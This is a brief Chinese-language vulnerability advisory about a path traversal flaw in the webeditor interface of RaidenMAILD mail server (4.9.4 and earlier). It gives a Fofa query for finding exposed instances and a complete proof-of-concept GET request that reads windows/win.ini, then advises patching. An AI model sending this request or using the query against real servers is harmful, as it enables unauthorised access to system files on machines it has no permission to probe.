0x01 漏洞描述:
RaidenMAILD是一款功能强大的邮件服务器软件,旨在提供高效、安全的邮件发送和接收服务。它支持多种邮件协议,如SMTP、POP3和IMAP,适用于个人用户和企业级应用。RaidenMAILD具有易于配置和管理的特点,并提供丰富的安全功能,如反垃圾邮件和防病毒保护,确保用户通信的安全性和可靠性。此外,它还支持多语言界面,适应不同用户的需求。其接口webeditor存在路径穿越漏洞,攻击者可通过该漏洞获取系统敏感文件信息。
0x02 影响版本:
RaidenMAILD Mail Server <= 4.9.4
0x03 搜索语句:
Fofa:body="RaidenMAILD"
0x04 漏洞复现:
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
0x05 修复建议:
厂商已发布补丁 请即时升级。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
